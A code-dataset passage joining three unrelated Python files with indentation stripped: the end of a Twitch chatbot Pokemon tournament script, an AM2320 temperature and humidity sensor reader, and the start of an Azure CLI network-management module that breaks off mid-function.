if not tournamentReady and not tournamentOpened and not tournamentStarted:
resetTournament(True)
tempResponseString = "All of the tournament staff and organizers went super saiyan and prepared the stadium for the next Tournament!"
else:
if tournamentStarted:
tempResponseString = "Tournament is already already under way @$user!"
elif tournamentOpened:
tempResponseString = "Tournament is already opened!"
elif tournamentReady:
tempResponseString = "Tournament is ready! No need for cleaning or additional preparations."
# LOCK STADIUM
elif(data.GetParam(1).lower() in cmdParamLockTourny and hasManagePermission):
if stadiumLocked:
tempResponseString = "Stadium is already locked."
else:
if tournamentStarted:
tempResponseString = "Stadium cannot be locked right now."
elif tournamentOpened:
tempResponseString = "Stadium cannot be locked right now."
elif tournamentReady:
tempResponseString = "Locking the Stadium now."
stadiumLocked = True
# START
elif(data.GetParam(1).lower() in cmdParamStartTourny and hasManagePermission):
if not stadiumLocked:
if not cooldownTimerThreadActive:
if len(enteredTrainers) > 0 and not tournamentStarted:
tempResponseString = "Starting the tournament!"
startTournament();
else:
tempResponseString = "Cannot start the tournament now."
else:
tempResponseString = "Tournament is on cooldown."
else:
tempResponseString = "Stadium is currently locked."
# STATUS
elif data.GetParam(1).lower() == "status" and FelOverride:
tempResponseString = getTournamentStatus()
# BATTLE STATUS
elif data.GetParam(1).lower() == "battlestatus" and FelOverride:
# @todo switch to whisper?
tempResponseString = getBattleStatus()
# RESET
elif data.GetParam(1).lower() == "reset" and hasManagePermission:
resetTournament()
tempResponseString = "@$user is hard resetting the tournament!"
# INFO
elif data.GetParam(1).lower() == "commands" and hasPermission:
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "UtilityCooldownCommands"):
pass
else:
# list the commands
s = "Available Commands: "
s += "types OR listtypes, "
s += "trainers, "
s += "commands, info"
s += "; Manager Commands: "
s += "start, "
s += "prepare OR readyup "
tempResponseString = s
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "UtilityCooldownCommands", settings["UtilityCooldown"])
# INFO
elif data.GetParam(1).lower() == "info" and hasPermission:
# check for cooldown
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "UtilityCooldownInfo"):
pass
else:
tempResponseString = "Script " + "[" + ScriptName + "]" + " version:" + Version + " made by: " + Creator
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "UtilityCooldownInfo", settings["UtilityCooldown"])
# ADDNPC
elif (data.GetParam(1).lower() == "addnpc" or data.GetParam(1).lower() == "addnpcs") and FelOverride:
count = 1
if RepresentsInt(data.GetParam(2)):
count = int(data.GetParam(2))
if count < 0:
count = 0
if not stadiumLocked:
if tournamentReady and not tournamentStarted:
typeoverride = ""
t = data.GetParam(3).lower()
if t in TYPES:
typeoverride = t
for x in range(count):
npc = RandomInstance.choice(randomNames)
npc += "NPC"
type = RandomInstance.choice(TYPES)
if typeoverride != "":
type = typeoverride
enteredTrainers.append(npc)
allTrainers.append(Fighter(npc, type, 0))
if tournamentOpened:
tempResponseString = "Entering $npc into the tournament with " + type + " type Pokemon!"
if not tournamentOpened:
tournamentOpened = True
randomType = RandomInstance.choice(TYPES)
randomType = str.capitalize(randomType)
tempResponseString = "$npc enters the pokemon stadium to claim the " + randomType + " Badge. "
tempResponseString += "Is there anyone willing to challenge them?"
tempResponseString = tempResponseString.replace("$npc", npc)
SendMsg(tempResponseString)
startEntranceLockTimer()
tempResponseString = ""
else:
tempResponseString = "Can't enter a random NPC into the tournament."
else:
tempResponseString = "Can't enter a random NPC into the tournament. The stadium is locked."
# LIST TYPES
elif(data.GetParam(1).lower() in cmdParamListTypes and hasPermission):
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "TypesUtilityCooldown"):
pass
else:
tempResponseString = str(TYPES)
tempResponseString = tempResponseString.replace("[","")
tempResponseString = tempResponseString.replace("]","")
tempResponseString = tempResponseString.replace("\'","")
tempResponseString = "You can enter the tournament with either of these pokemon types: " + tempResponseString
tempResponseString += " or use random."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "TypesUtilityCooldown", settings["UtilityCooldown"])
# LIST TRAINERS
elif(data.GetParam(1).lower() in cmdParamListTrainers and hasPermission):
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "TrainersUtilityCooldown"):
pass
else:
if len(enteredTrainers) > 0:
tempResponseString = "Trainers which entered: "
i = 0
for x in enteredTrainers:
tempResponseString += "@" + x
if i < len(enteredTrainers) - 1:
tempResponseString += ", "
i += 1
else:
tempResponseString = "No trainers entered the tournament yet."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "TrainersUtilityCooldown", settings["UtilityCooldown"])
# JOIN TOURNY AS A USER
elif data.GetParamCount() == 2 and hasPermission: #we have exactly two params, that means the second one should be a type
# @todo how to subtract points when they are external?
entryprice = settings["EntryCost"]
# check locked
if not stadiumLocked:
# check ready
if tournamentReady:
# check started
if not tournamentStarted:
if user not in enteredTrainers:
type = data.GetParam(1).lower()
if type in TYPES or type == "random":
if entryprice <= Parent.GetPoints(data.User): # use param for the price
if type == "random":
type = RandomInstance.choice(TYPES)
enteredTrainers.append(user)
allTrainers.append(Fighter(user, type, 0))
if tournamentOpened:
if settings["EnableEntryResponse"]:
tempResponseString = "Entering @$user into the tournament with " + type + " type Pokemon!"
if not tournamentOpened:
tournamentOpened = True
tempResponseString = "@$user with " + type + " type Pokemon enters the Stadium to claim the Badge! "
tempResponseString += "Is there anyone willing to challenge them?"
startEntranceLockTimer()
else:
if settings["UseCommonResponses"] and settings["EnableEntryCostResponse"]:
# @todo a case when external points are used?
tempResponseString = ""
else:
if settings["UseCommonResponses"] and settings["EnableInvalidTypeResponse"]:
tempResponseString = "@$user ! " + data.GetParam(1) + " is an invalid Pokemon type!"
else:
if settings["UseCommonResponses"]:
tempResponseString = "@$user already entered the tournament."
else:
if settings["UseCommonResponses"]:
tempResponseString = "@$user you are too late. The tournament is already under way."
# slowpoke msg
if RandomInstance.random() < 0.05:
tempResponseString = "@$user is a Slowpoke. Kappa The tournament is already under way."
pass
else:
if settings["UseCommonResponses"]:
# theres a cooldown
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "StadiumUtilityCooldown"):
pass
else:
tempResponseString = "The stadium is currently being cleaned and repaired for the upcoming tournament."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "StadiumUtilityCooldown", settings["UtilityCooldown"])
elif stadiumLocked:
tempResponseString = "The stadium is locked."
# RANDOM TEST
if (data.GetParam(0).lower() == "!randomtest" and FelOverride):
tempResponseString = "random counts: "
counts = {}
for x in range(0, len(TYPES)):
counts[x] = 0
m = 0
for x in range(0, 10000):
r = RandomInstance.random()
m = max(r,m)
val = int(r * len(TYPES))
counts[val] += 1
for x in counts.keys():
tempResponseString += str(x) + "-" + str(counts[x]) + "; "
tempResponseString += " max:" + str(m)
# REF TEST
if (data.GetParam(0).lower() == "!reftest" and FelOverride):
tempResponseString = "ref test: "
array1 = ["0","1","2","4"]
array2 = ["5", "6"]
array2.append(array1[0])
tempResponseString += str(array1) + " " + str(array2)
tempResponseString += " => "
array1[0] = "x"
tempResponseString += str(array1) + " " + str(array2)
tempResponseString = tempResponseString.replace("$user", user)
SendMsg(tempResponseString)
return
#---------------------------------------
# Reload Settings on Save
#---------------------------------------
def ReloadSettings(jsonData):
global settings, configFile
Init()
s = "Stadium settings reloaded."
Parent.SendTwitchMessage(s)
return
def OpenReadMe():
location = os.path.join(os.path.dirname(__file__), "ReadMe.txt")
os.startfile(location)
return
#---------------------------------------
# [Required] Tick Function
#---------------------------------------
def Tick():
global currentTick, tickCounter, RandomInstance
global lastAnnouncementTime
if tickCounter % 100 == 0:
Debug("Tick:" + currentTick)
# try announce tournament ready
if settings["EnablePeriodicAnnouncement"] and settings["PeriodicAnnouncementPeriod"] > 0:
if not tournamentStarted and not tournamentOpened and currentTick != "Cooldown" and tournamentReady:
s = ""
# compare last announcement time
delta = datetime.now() - lastAnnouncementTime
Debug("trying to announce:" + str(delta.total_seconds()) + "stadiumlocked:" + str(stadiumLocked))
if delta.total_seconds() >= settings["PeriodicAnnouncementPeriod"]:
if stadiumLocked:
if settings["PeriodicAnnouncementEvenWhenLocked"]:
s = "Stadium is locked, when it unlocks use " + settings["Command"] + " <pokemon type> to enter."
else:
s = "Stadium is open! Enter the tournament using " + settings["Command"] + " <pokemon type>."
lastAnnouncementTime = datetime.now()
SendMsg(s);
tickCounter += 1
if tournamentOpened and not tournamentStarted:
#tick entrance lock
if currentTick == "EntranceLock" and not entranceLockTimerThreadActive:
s = "The tournament sign up period begins now! Pokemon Trainers! You have $time seconds to sign up!"
s = s.replace("$time", str(settings["TournamentSignUpPeriod"]))
SendMsg(s)
Debug("starting entrance lock timer")
threading.Thread(target=EntranceLockTimerThread, args=()).start()
if tournamentStarted:
#tick pause before tourny start
if currentTick == "StartPause" and not startPauseTimerThreadActive:
# if only one trainer entered, finish the tournament
if len(enteredTrainers) == 1:
s0 = "Only @" + enteredTrainers[0] + " signed up for the tournament. Sadly for them, no reward will be paid out because that would be too easy."
s1 = "After waiting in the lobby for " + str(1+RandomInstance.randint(1,9)) + " hours, @" + enteredTrainers[0] + " leaves the Stadium empty handed as staff refused to award anything to them for being the only trainer to show up."
s2 = "@" + enteredTrainers[0] + " grumpily leaves the Stadium as there was one else to challenge."
s = RandomInstance.choice([s0, s1, s2]);
SendMsg(s)
currentTick = "TournamentFinish"
else:
#announce tournament started
s = str(len(enteredTrainers)) + " trainers have signed up for the tournament. There's a future champion among them, but nobody knows who it will be. "
s += "We will soon find out! The tournament staff announces the start! "
s += "The stadium closes, the stands rumble with cheering and the first challengers for the Badge enter the Stadium's arena."
SendMsg(s)
threading.Thread(target=StartPauseTimerThread, args=()).start()
#tick tournament advancement
if currentTick == "Tournament" and not tournamentTimerThreadActive:
#process current round
result = advanceTournament()
# if we are close to the Final match we broadcast each individual match (based on a setting)
if result["IsFinalBattle"] == True:
s = ""
battle = result["Battles"][0]
Debug("Final battle has progressed: " + str(battle.hasProgressed ) + " " + str(battle.remainingProgression))
if battle.remainingProgression > 0 and result["BattleHasProgressed"] == False:
s0 = "The final battle is here! @$trainer1$type1 and @$trainer2$type2 will fight for the Badge."
s1 = "@$trainer1$type1 and @$trainer2$type2 are about to meet in the finals!"
s2 = "@$trainer1$type1 and @$trainer2$type2 are about to duke it out for the Badge!"
s = RandomInstance.choice([s0, s1, s2])
elif battle.remainingProgression == 0 and settings["FinalsStyle"] == "Short":
s = "In the finals, @$winner wins against @$loser."
elif battle.remainingProgression >= 1:
Debug("Tick: final battle progressing")
s0 = "The battle is fierce! The finalists are using all of the tricks they learned on their journey of becoming the best pokemon trainer."
s1 = "@$trainer1 is putting on a lot of pressure but @$trainer2 is keeping up!"
s2 = "@$trainer2 is putting on a lot of pressure but @$trainer1 is keeping up!"
s3 = "It's not looking good for @$trainer1, they are falling behind while being on the defensive!"
s4 = "It's not looking good for @$trainer2, they are falling behind while being on the defensive!"
s5 = "Both trainers pulled back. They are preparing for the next exchange of attacks!"
s = RandomInstance.choice([s0, s1, s2, s3, s4, s5])
elif battle.remainingProgression == 0:
s0 = "Amazing! After a serious exchange @$winner manages to overpower their oponent and finish them off."
s1 = "Amazing! At the last second @$winner's Pokemon pulls off an amazing move against $loser and wins."
s2 = "At last, @$winner finds a crack in @$loser's defenses and deals them a finishing blow."
s = RandomInstance.choice([s0, s1, s2])
# replace tags
s = s.replace("$trainer1", allTrainers[battle.trainerTop].name)
s = s.replace("$trainer2", allTrainers[battle.trainerBot].name)
if settings["ShowTrainerType"]:
s = s.replace("$type1", " (" + allTrainers[battle.trainerTop].deckType + ")")
s = s.replace("$type2", " (" + allTrainers[battle.trainerBot].deckType + ")")
else:
s = s.replace("$type1", "")
s = s.replace("$type2", "")
if battle.winner != None:
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$type", str(allTrainers[battle.winner].deckType).capitalize())
if battle.loser != None:
s = s.replace("$loser", allTrainers[battle.loser].name)
SendMsg(s)
else:
# if we go match by match
if settings["AdvancementStyle"] == "PerBattle":
s = ""
battle = result["Battles"][0]
if battle.trainerTop != None and battle.trainerBot != None:
if battle.remainingProgression > 0 and result["BattleHasProgressed"] == False:
s = "The match between @$trainer1$type1 and @$trainer2$type2 is underway"
elif battle.remainingProgression >= 1:
s = "@$trainer1 and @$trainer2 are going at it."
elif battle.remainingProgression == 0:
s0 = "@$winner$typeWinner wins the battle against @$loser$typeLoser."
s1 = "@$winner$typeWinner wins convincingly against @$loser$typeLoser."
s2 = "In a close match @$winner$typeWinner bests @$loser$typeLoser."
s = RandomInstance.choice([s0, s1, s2])
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$loser", allTrainers[battle.loser].name)
if settings["ShowTrainerType"]:
s = s.replace("$typeWinner", " (" + allTrainers[battle.winner].deckType + ")")
s = s.replace("$typeLoser", " (" + allTrainers[battle.loser].deckType + ")")
else:
s = s.replace("$typeWinner", "")
s = s.replace("$typeLoser", "")
s = s.replace("$trainer1", allTrainers[battle.trainerTop].name)
s = s.replace("$trainer2", allTrainers[battle.trainerBot].name)
if settings["ShowTrainerType"]:
s = s.replace("$type1", " (" + allTrainers[battle.trainerTop].deckType + ")")
s = s.replace("$type2", " (" + allTrainers[battle.trainerBot].deckType + ")")
else:
s = s.replace("$type1", "")
s = s.replace("$type2", "")
SendMsg(s)
else:
trainer = ""
if battle.trainerTop == None and battle.trainerBot != None:
trainer = allTrainers[battle.trainerBot].name
if battle.trainerTop != None and battle.trainerBot == None:
trainer = allTrainers[battle.trainerTop].name
if trainer != "":
s = trainer + " has no opponent for this battle, they advance by default."
SendMsg(s)
elif settings["AdvancementStyle"] == "PerRound": # if we go be entire round
s = ""
addedWinners = False
if settings["ResultAnnoucementStyle"] == "Winners" or settings["ResultAnnoucementStyle"] == "Both":
s = "Another round of battles is finished. "
addedWinners = True
# get all the winners
winners = []
for i in range(len(result["Battles"])):
if result["Battles"][i].winner != None:
winners.append(allTrainers[result["Battles"][i].winner].name)
pass
if len(winners) > 0:
s += "Trainers progressing to the next round are: "
for j in range(len(winners)):
s += winners[j]
if j != (len(winners) - 1):
s += ", "
else:
s = "No Trainers are progressing into the next round."
SendMsg(s)
if settings["ResultAnnoucementStyle"] == "losers" or settings["ResultAnnoucementStyle"] == "Both":
if addedWinners:
s = ""
else:
s = "Another round of battles is finished. "
# get all the losers
losers = []
for i in range(len(result["Battles"])):
if result["Battles"][i].loser != None:
losers.append(allTrainers[result["Battles"][i].loser].name)
pass
if len(losers) > 0:
s += "Trainers knocked out of the tournament are: "
for j in range(len(losers)):
s += losers[j]
if j != (len(losers) - 1):
s += ", "
else:
s = "No Trainers lost this round."
SendMsg(s)
#if tournament isnt finished launch timer to wait for next rounds
if currentProgressionDepth > 0:
threading.Thread(target=TournamentTimerThread, args=()).start()
else:
currentTick = "TournamentFinish"
if currentTick == "TournamentFinish":
if len(enteredTrainers) > 1:
battle = allMatches[0]
winnings = allTrainers[battle.winner].currentWinnings
winnings += settings["FinalPrizePerTrainer"] * len(enteredTrainers)
winnings += settings["FinalPrize"]
#announce winners
s = "The tournament is over, @$winner wins with $type Pokemon. The Badge is theirs."
if winnings > 0:
if settings["EnablePayout"] == True:
s += " Their winnings are $amount $currency!"
else:
s += " They should be paid out $amount $currency!"
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$type", str(allTrainers[battle.winner].deckType).capitalize())
s = s.replace("$amount", str(winnings))
s = s.replace("$currency", settings["CurrencyName"])
SendMsg(s)
if settings["EnablePayout"] == True:
# pay out winners
if settings["UseExternalPayout"]:
s = settings["ExternalPayoutCommand"]
s = s.replace("$user", allTrainers[battle.winner].name)
s = s.replace("$amount", str(winnings))
Parent.SendTwitchMessage(s)
else: # pay out with internal currency
Parent.AddPoints(allTrainers[battle.winner].name, winnings)
SendMsg("The Stadium closes...")
finishTournament();
#tick post tourny cooldown
if currentTick == "Cooldown" and not cooldownTimerThreadActive:
threading.Thread(target=CooldownTimerThread, args=()).start()
return
|
am2320.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Todo: ログ出力用のバッファを実装
import smbus
import time
import datetime
import threading
address = 0x5c # 1011100(7bit,0x5c) + 0(1bit,R/W bit) = 0xb8
READ_INT = 5 # [sec], each reading interval is to be grater than 2 sec
LOG_INT = 600 # [sec]
DEBUG_MODE = True
# 日時付きでメッセージ表示
def printDateMsg(msg):
d = datetime.datetime.today()
print d.strftime('%Y/%m/%d %H:%M:%S') + ' [TRMO] ' + msg
# am2320 のクラス
class Thermo():
def __init__(self):
self.__i2c = smbus.SMBus(1)
self.__hum = 0.0
self.__tmp = 0.0
self.tu = threading.Thread(target=self.__updateValue)
self.tu.setDaemon(True)
self.tu.start()
self.tl = threading.Thread(target=self.__logValue)
self.tl.setDaemon(True)
self.tl.start()
def __updateValue(self):
while True:
try:
self.__i2c.write_i2c_block_data(address, 0x00, []) # センサsleep解除
except:
pass # センサはACK が帰ってくるとは限らない仕様
time.sleep(0.001)
try:
self.__i2c.write_i2c_block_data(address,0x03,[0x00,0x04]) # 読み取り命令
except:
if DEBUG_MODE: printDateMsg("[Error] am2320(1) ")
self.__hum = 0.0 # 読み取り失敗時は0.0
self.__tmp = 0.0
time.sleep(READ_INT)
continue
time.sleep(0.015)
try:
block = self.__i2c.read_i2c_block_data(address,0,6) # データ受取
except:
if DEBUG_MODE: printDateMsg("[Error] am2320(2) ")
self.__hum = 0.0 # 読み取り失敗時は0.0
self.__tmp = 0.0
time.sleep(READ_INT)
continue
time.sleep(0.001)
self.__hum = (block[2] << 8 | block[3])/10.0
self.__tmp = (block[4] << 8 | block[5])/10.0
time.sleep(READ_INT)
def __logValue(self):
while True:
time.sleep(LOG_INT)
printDateMsg(self.stringValue())
def getHum(self):
return self.__hum
def getTmp(self):
return self.__tmp
def stringValue(self):
return "湿度: " + str(self.getHum()) + "%, " \
+ "温度: " + str(self.getTmp()) + "℃"
def displayValue(self):
print self.stringValue()
def main_loop():
while True:
thermo.displayValue()
time.sleep(1)
if __name__ == '__main__':
thermo = Thermo()
try:
main_loop()
except KeyboardInterrupt:
print "Keyboard Interrupt"
# finally:
# thermo.stop()
# ============= EOF ======================
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
